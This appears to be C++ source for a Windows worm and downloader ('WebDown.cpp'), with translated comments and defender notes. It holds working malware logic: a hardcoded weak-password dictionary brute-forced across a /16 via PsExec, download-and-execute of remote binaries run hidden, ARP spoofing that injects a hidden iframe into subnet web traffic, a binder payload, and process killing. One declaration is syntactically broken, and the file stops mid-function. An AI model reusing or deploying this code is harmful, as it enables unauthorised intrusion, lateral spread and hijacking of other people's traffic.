// WebDown.cpp : Defines the entry point for the console application.
#include "stdafx.h"
#include "WebDown.h"
#include "wrom.h"
#include "win32cpp.h"
//#include "ipc.h"
#include <Dbt.h>
#include "winsvc.h"
#include "winsvc.h"
#include "winsock2.h"
#pragma comment(lib,"ws2_32.lib")
#include "PingI.h"
#include "winnetwk.h"
#pragma comment(lib,"mpr.lib")
#include <tlhelp32.h>
//#include "afxinet.h"
#include <Iprtrmib.h>
// Credential dictionary consumed by getipfun(): every entry of user[] is paired with
// every entry of pass[] against each candidate host, via ConnectRemote().
// Both arrays are terminated by a null pointer. The "NULL" password entry is a
// sentinel that ConnectRemote() turns into an empty ("") password.
// Defender note: these literal strings are embedded verbatim in the binary and are
// usable as a static signature; the pairing produces a burst of 15 x 21 logon
// attempts per target host, which should stand out in authentication logs.
const char *user[]={
"administrator","admin", "guest","alex", "home",
"love","xp", "user","game", "123",
"movie","time", "yeah","money", "xpuser",
0};
// Passwords tried for each username above; "NULL" means empty password.
const char *pass[]={
"NULL",
"password", "123456","qwerty","abc123", "memory",
"home", "12345678","love","xp", "88888",
"5201314", "1314520","asdfgh","alex", "angel",
"123", "asdf","baby","woaini", "movie",
0};
/////////////////////////////////////////////////////////////////////////////
// Run-time configuration block (field comments translated from the original Chinese).
// The defaults below (loopback URLs, placeholder iframe) look like build-time
// placeholders; the struct name suggests an external builder patches the compiled
// binary's copy of modify_data — nothing in the visible code writes to it, so confirm.
// Only the URL fields are read in this portion of the file; the bool flags and
// WaitTime are not referenced here.
struct MODIFY_DATA
{
char DownFile[100];// URL of the download list (original: "download file list")
char DownRunFile[100]; // URL fetched as <system dir>\psexec.exe by ConnectRemote() (original: "download ip and run server program")
char DownRunURLFile[100]; // URL fetched as <system dir>\servrr.exe by ConnectRemote() (same original comment)
char ArpInject[256]; // HTML passed to ArpW.exe -insert by ArpRemote() (original: "ARP infection web-trojan code")
char DownRunArpFile[100]; // base URL for the five ARP toolkit files fetched by ArpRemote() (original: "ARP download URL")
char DownRunBindFile[100]; // URL fetched as <system dir>\BindF.exe by DownBindRun() (original: "file-binding download URL")
bool IsWorm;// flag: infect EXE files at startup (original wording); not read in the visible code
bool IsUpan;// flag: spread via USB drives; not read in the visible code
bool IsShare;// flag: spread via weak passwords; not read in the visible code
bool IsAnti;// flag: anti-detection ("anti-kill"); not read in the visible code
bool IsARP; // flag: ARP infection; not read in the visible code
int WaitTime;// polling interval in minutes (original: "patrol time (minutes)"); not read in the visible code
}modify_data =
{
"http://127.0.0.1/down.list",
"http://127.0.0.1/",
"http://127.0.0.1/",
"<iframe src='http://xxx.htm' width=0 height=0>",
"http://127.0.0.1/",
"http://127.0.0.1/",
false,
false,
false,
false,
false,
20,
};
// File-scope state. None of these globals are referenced by the functions visible
// in this portion of the file; purposes below are inferred from names/types only.
HWND hWnd; // window handle — unused here
char DownFileDate1[9]="88-88-88"; // date stamp with an "88-88-88" sentinel — presumably last download-list date; confirm
char DownFileDate2[9]="88-88-88"; // second date stamp, same sentinel
SERVICE_STATUS service_status_ss; // SCM status record — presumably for service entry points outside this view
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc; // service control manager / service handles
//======================================
// IPHLPAPI function-pointer types (resolved at run time rather than linked; the
// pointers below are never assigned or called in the visible code).
typedef DWORD (WINAPI *GetTcpTableFun)(PMIB_TCPTABLE,PDWORD,BOOL);
typedef DWORD (WINAPI *SetTcpEntryFun) (PMIB_TCPROW ); // SetTcpEntry changes a TCP row's state — presumably used to drop connections; confirm
typedef DWORD (WINAPI *GetUdpTableFun)(PMIB_UDPTABLE,PDWORD,BOOL);
PMIB_TCPTABLE mibtcp; // TCP connection table
PMIB_UDPTABLE mibUdp; // UDP listener table
BYTE pTcpBuf[100*20+4]; // raw buffer for the TCP table (fixed size; MIB_TCPROW is 20 bytes + 4-byte count)
char *DisConIPAddr[10]; // presumably addresses whose connections get disconnected — confirm
int iDisCon; // count of entries in DisConIPAddr — presumably
HINSTANCE hInst; // module handle for the resolved library — presumably
GetTcpTableFun pGetTcp;
GetUdpTableFun pGetUdp;
SetTcpEntryFun pEtyTcp;
//========================================
/* Decodes szRec in place (original comment: "decrypt data function").
 * For each of the nLen bytes: subtract the current key byte, then XOR with the
 * same key byte. The key pointer restarts at szKey whenever it reaches the
 * terminating NUL, so the key is cycled over the record.
 * szRec: buffer of nLen bytes, modified in place.
 * szKey: NUL-terminated key. An empty key is not handled: the reset branch
 *        then advances p past the terminator and the next iteration reads
 *        beyond it.
 * Not called anywhere in the visible part of this file. */
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
unsigned long i;
char *p;
p = szKey;
for(i = 0; i < nLen; i++) {
if(!(*p))
p = szKey;
*szRec -= *p;
*szRec++ ^= *p++;
}
}
//====================================================================
// Terminates every running process whose image name equals processName
// (case-insensitive, CString::CompareNoCase against PROCESSENTRY32::szExeFile),
// walking a Toolhelp snapshot of all processes.
// processName: bare executable name, e.g. the szExeFile form, not a path.
// Return values of CreateToolhelp32Snapshot, Process32First and OpenProcess are
// not checked; the do/while body still runs once on a failed enumeration.
// Callers are outside this view, so which images are targeted is not visible here.
// Defender note: a process opening unrelated processes with PROCESS_TERMINATE and
// calling TerminateProcess by image name is a typical security-tool-tampering
// pattern and is worth an alert on the Process/Thread creation telemetry.
void KillProcess(char * processName)
{
HANDLE hSnapshot;
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe;
Process32First(hSnapshot,&pe);
do
{ CString KillProcessName = processName; // rebuilt every iteration
if(KillProcessName.CompareNoCase(pe.szExeFile) == 0)
{
HANDLE hProcess;
hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,pe.th32ProcessID);
if (hProcess)
{
TerminateProcess(hProcess,0);// kill the process (hProcess is never closed)
}
}
}
while(Process32Next(hSnapshot,&pe));
CloseHandle(hSnapshot);
}
// Lateral-movement attempt against one host with one credential pair.
// Fetches modify_data.DownRunFile into <system dir>\psexec.exe and
// modify_data.DownRunURLFile into <system dir>\servrr.exe, then launches
//   psexec.exe \\<RemoteIP> -u <lpUserName> -p <pwd> -c <system dir>\servrr.exe -d
// hidden via WinExec. lpPassword equal to "NULL" is sent as "" (an empty,
// quoted password); any other value is passed through unchanged.
// Returns the WinExec result (a UINT; > 31 means the local launch succeeded),
// which says nothing about whether the remote logon or copy worked.
// Both downloads are repeated on every call — i.e. once per credential pair per
// host in getipfun() — and their HRESULTs are ignored.
// Defender note: psexec.exe and servrr.exe dropped into the system directory, a
// PsExec command line with -c/-d iterated over many hosts, and the PSEXESVC
// service PsExec normally installs on the target are the observable artifacts.
DWORD ConnectRemote(const char *RemoteIP,const char *lpUserName,const char *lpPassword)
{
char sDownRunFileUP[256], sDownRunFileServer[256], char sPwd[20];
memset(sDownRunFileUP, 0, 256);
memset(sDownRunFileServer, 0, 256);
sprintf(sDownRunFileUP, "%s", modify_data.DownRunFile);
sprintf(sDownRunFileServer, "%s", modify_data.DownRunURLFile);
char SysDirBuff[256], File1[256], File2[256];
memset(File1, 0, 256);
memset(File2, 0, 256);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
sprintf(File1, "%s\\psexec.exe", SysDirBuff);
sprintf(File2, "%s\\servrr.exe", SysDirBuff);
URLDownloadToFile(0, sDownRunFileUP, File1, 0, 0);
URLDownloadToFile(0, sDownRunFileServer, File2, 0, 0);
memset(sPwd, 0, 20);
if(strcmp(lpPassword, "NULL") == 0)
sprintf(sPwd, "\"%s\"", ""); // "NULL" sentinel -> empty quoted password
else
sprintf(sPwd, "%s", lpPassword);
char filesring[2048];
memset(filesring, 0, 2048);
sprintf(filesring, "%s\\psexec.exe \\\\%s -u %s -p %s -c %s\\servrr.exe -d", SysDirBuff, RemoteIP, lpUserName, sPwd, SysDirBuff);
Sleep(1000); // one-second pause per attempt
int nRet = WinExec(filesring, SW_HIDE);
return nRet;
}
// Returns the prefix of ch up to and including its second '.'
// (e.g. "1.2.3.4" -> "1.2."); returns an empty CString when ch holds fewer
// than two dots. The loop keeps scanning after the second dot but aaa is only
// assigned once. getipfun() uses this to derive the /16 prefix it sweeps.
CString jian2(CString ch)
{
CString aaa;
int nCount = 0;
for(int i=0;i<ch.GetLength();i++)
{
if(ch.Mid(i,1)=='.')
{
nCount ++;
if(nCount == 2)
{
aaa = ch.Left(i + 1); // include the second dot itself
}
}
}
return(aaa);
}
// Returns ch with every character that is not an ASCII digit or '.' removed
// (e.g. "ip=10.0.0.1\" >" -> "10.0.0.1"). Characters are dropped, not treated as
// a terminator: the commented-out else/break shows an earlier variant that
// stopped at the first non-matching character.
CString jian(CString ch)
{
CString aaa;
for(int i=0;i<ch.GetLength();i++)
{
if(ch.Mid(i,1)=='0'||ch.Mid(i,1)=='1'||ch.Mid(i,1)=='2'||ch.Mid(i,1)=='3'||ch.Mid(i,1)=='4'||ch.Mid(i,1)=='5'||ch.Mid(i,1)=='6'||ch.Mid(i,1)=='7'||ch.Mid(i,1)=='8'||ch.Mid(i,1)=='9'||ch.Mid(i,1)=='.')
aaa+=ch.Mid(i,1);
// else
// break;
}
return(aaa);
}
// Strips the final dotted octet from an IPv4 string, keeping the trailing dot
// (e.g. "192.168.1.25" -> "192.168.1.", "10.0.0.100" -> "10.0.0.").
// Works by looking at the last three characters: if a '.' is among them, only
// the characters after it are removed; otherwise all three are removed. A last
// segment longer than three characters would therefore be cut incorrectly.
// LocalToArp() uses the result to build the "<prefix>2-<prefix>255" range.
CString jian1(CString ch)
{
CString aaa = ch.Right(3);
for(int i=0;i<aaa.GetLength();i++)
{
if(aaa.Mid(i,1)=='.')
{
aaa = aaa.Right(3 - (i + 1)); // the digits after the last dot
break;
}
}
CString bbb = ch.Left(ch.GetLength() - aaa.GetLength());
return(bbb);
}
// Get the public IP, then sweep its /16 (original comment: "get public IP").
// 1. Fetches http://union.itlearner.com/ip/getip.asp with WinInet and scrapes the
//    value following `input name="ip"`, reducing it to digits and dots (jian()).
// 2. Takes the first two octets (jian2()) and, for every j in 90..254 and
//    n in 2..254, formats "<a>.<b>.j.n"; for each such address other than the
//    host's own, calls ConnectRemote() with every user[]/pass[] combination.
// If the fetch fails, ch stays empty, both Find() calls return -1 and the
// derived prefix is empty/garbage — there is no early exit, so the loops still
// run with malformed addresses. The sweep is fully sequential and each
// ConnectRemote() sleeps one second, so a single pass (165 x 253 hosts x 15 x 21
// credential pairs) would take on the order of months of wall-clock time.
// Defender note: the outbound request to union.itlearner.com and a sequential
// PsExec logon sweep across a /16 are the network-level indicators of this routine.
void getipfun()
{
CInternetSession session; // WinInet session used to fetch the page
CHttpFile *pFile=NULL;
CString str,ch; //www.ip138.com/ips8.asp
CString m_szSite="http://union.itlearner.com/ip/getip.asp"; // the public IP is read from this page's response
try{
pFile=(CHttpFile*)session.OpenURL(m_szSite);} // open the URL
catch(CInternetException *pEx) // error handling
{
pFile=NULL;
pEx->Delete();
}
if(pFile)
{
while(pFile->ReadString(str)) // read one line at a time
{
ch+=str+"\r\n";
}
pFile->Close();
delete pFile;
}
else
{
ch+=""; // no-op: ch remains empty on failure
}
CString lin;
CString aaaa;
lin=ch.Mid(ch.Find("input name=\"ip\"")+2,50); // window of text around the IP field
lin=lin.Mid(lin.Find(".") - 3,15); // re-anchor on the first dot of the address
lin=jian(lin); // keep only digits and dots
CString bbb = jian2(lin); // "<a>.<b>." prefix of the /16
CString cccccc;
for(int j = 90; j < 255; j ++)
{
for(int n = 2; n < 255; n ++)
{
cccccc.Empty();
cccccc.Format("%s%d.%d", bbb, j, n);
if(cccccc.CompareNoCase(lin) != 0) // skip the host's own address
{
for(int mm = 0;user[mm]; mm++)
{
for (int k=0;pass[k];k++)
{
ConnectRemote(cccccc, user[mm], pass[k]);
}
}
}
}
}
}
//==================================================================================
// ARP-spoofing injection step for one address range.
// Downloads five files from the modify_data.DownRunArpFile base URL into the
// system directory: arp.exe (saved as ArpW.exe), nogui.exe, wpcap.dll,
// packet.dll and wanpacket.dll. Runs nogui.exe hidden (presumably a silent
// WinPcap installer, given the accompanying wpcap/packet DLLs — confirm), waits
// 50 s, then runs
//   ArpW.exe -idx 0 -ip <RemoteIP> -port 80 -insert "<modify_data.ArpInject>"
// hidden.
// RemoteIP: an address-range string such as "a.b.c.2-a.b.c.255" (see LocalToArp()).
// Always returns 0; download HRESULTs and WinExec results are ignored.
// Defender note: these five file names appearing in the system directory, an
// unexpected WinPcap packet driver installation, and HTML being injected into
// port-80 responses across a subnet are the artifacts to look for.
DWORD ArpRemote(const char *RemoteIP)
{
char SysDirBuff[256], ArpFile[256], strDownRunArpFile[256], strDownRunWincap[256],
strWpCapDll[256], strPaketdll[256], strwanpacketdll[256],
DownRunWincap[256], WpCapDll[256], Paketdll[256], wanpacketdll[256];
memset(ArpFile, 0, 256);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
sprintf(ArpFile, "%s\\ArpW.exe", SysDirBuff);
memset(strDownRunArpFile, 0, 256);
memset(strDownRunWincap, 0, 256);
memset(strWpCapDll, 0, 256);
memset(strPaketdll, 0, 256);
memset(strwanpacketdll, 0, 256);
memset(DownRunWincap, 0, 256);
memset(WpCapDll, 0, 256);
memset(Paketdll, 0, 256);
memset(wanpacketdll, 0, 256);
// local destination paths
sprintf(DownRunWincap, "%s\\nogui.exe", SysDirBuff);
sprintf(WpCapDll, "%s\\wpcap.dll", SysDirBuff);
sprintf(Paketdll, "%s\\packet.dll", SysDirBuff);
sprintf(wanpacketdll, "%s\\wanpacket.dll", SysDirBuff);
// remote source URLs
sprintf(strDownRunArpFile, "%s/arp.exe", modify_data.DownRunArpFile);
sprintf(strDownRunWincap, "%s/nogui.exe", modify_data.DownRunArpFile);
sprintf(strWpCapDll, "%s/wpcap.dll", modify_data.DownRunArpFile);
sprintf(strPaketdll, "%s/packet.dll", modify_data.DownRunArpFile);
sprintf(strwanpacketdll, "%s/wanpacket.dll", modify_data.DownRunArpFile);
URLDownloadToFile(0, strDownRunArpFile, ArpFile, 0, 0);
URLDownloadToFile(0, strDownRunWincap, DownRunWincap, 0, 0);
URLDownloadToFile(0, strWpCapDll, WpCapDll, 0, 0);
URLDownloadToFile(0, strPaketdll, Paketdll, 0, 0);
URLDownloadToFile(0, strwanpacketdll, wanpacketdll, 0, 0);
char filesring[2048];
memset(filesring, 0, 2048);
// run nogui.exe (original comment: "run wincap")
WinExec(DownRunWincap, SW_HIDE);
Sleep(50000); // 50 s, presumably to let the installer finish
memset(filesring, 0, 2048);
sprintf(filesring, "%s\\ArpW.exe -idx 0 -ip %s -port 80 -insert \"%s\"", SysDirBuff, RemoteIP, modify_data.ArpInject);
WinExec(filesring, SW_HIDE);
return 0;
}
// Runs ArpRemote() against the local subnet of every IPv4 address bound to this
// host: initialises Winsock 2.2, resolves gethostname() via gethostbyname(), and
// for each address turns "a.b.c.d" into the range string "a.b.c.2-a.b.c.255"
// using jian1().
// The version check reads wsaData even when WSAStartup() failed (errret is
// assigned but never examined), and the early return skips WSACleanup().
// lvi is a list-view item that is filled in but never used — presumably left
// over from a GUI variant of this code.
void LocalToArp()
{
WORD wVersion =0 ;
int errret = -1;
WSADATA wsaData;
wVersion = MAKEWORD(2,2);
errret = WSAStartup(wVersion,&wsaData);
if( LOBYTE( wsaData.wVersion) != 2 ||
HIBYTE( wsaData.wVersion) !=2 )
{
return ;
}
char szHostName[128]; // buffer for the local host name
struct hostent * pHost; // result of gethostbyname()
int i; // index into h_addr_list
char IPStr[100];
LVITEM lvi; // unused list-view item (see header comment)
lvi.mask=LVIF_IMAGE|LVIF_TEXT;
lvi.iItem=0;
lvi.iSubItem=0;
lvi.iImage=0;
if(gethostname(szHostName,128)==0)
{
pHost = gethostbyname(szHostName);
for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ )
{
CString IPAddress = inet_ntoa (*(struct in_addr *)pHost->h_addr_list[i]);
CString cccc = jian1(IPAddress); // "a.b.c." prefix
memset(IPStr, 0, 100);
sprintf(IPStr, "%s2-%s255", cccc, cccc); // "a.b.c.2-a.b.c.255"
ArpRemote(IPStr);
}
}
WSACleanup();
}
// Thread entry point that runs LocalToArp() once; dParam is ignored.
// Always returns 0 as the thread exit code.
unsigned long CALLBACK ARP_thread(LPVOID dParam)
{
LocalToArp();
return 0;
}
// Binder infection (original comment): downloads modify_data.DownRunBindFile to
// <system dir>\BindF.exe and runs it hidden via WinExec.
// The WinExec result is stored in nRet but never used; the function always
// returns 0 and the download HRESULT is ignored. The variable is named ArpFile
// but holds the BindF.exe path.
// Defender note: BindF.exe in the system directory is the on-disk artifact.
DWORD DownBindRun()
{
char SysDirBuff[256], ArpFile[256];
memset(ArpFile, 0, 256);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
sprintf(ArpFile, "%s\\BindF.exe", SysDirBuff);
URLDownloadToFile(0, modify_data.DownRunBindFile, ArpFile, 0, 0);
int nRet = WinExec(ArpFile, SW_HIDE);
return 0;
}
// Thread entry point that runs DownBindRun() once; dParam is ignored.
// Always returns 0 as the thread exit code.
unsigned long CALLBACK Bind_thread(LPVOID dParam)
{
DownBindRun();
return 0;
}
//==================================================================================
/* 功能说明:查询本机的名称和IP地址. */
void QueryLocalIP()
{
WORD wVersion =0 ;
int errret = -1;
WSADATA wsaData;
wVersion = MAKEWORD(2,2);
errret = WSAStartup(wVersion,&wsaData);
if( LOBYTE( wsaData.wVersion) != 2 ||
HIBYTE( wsaData.wVersion) !=2 )
{
return ;
}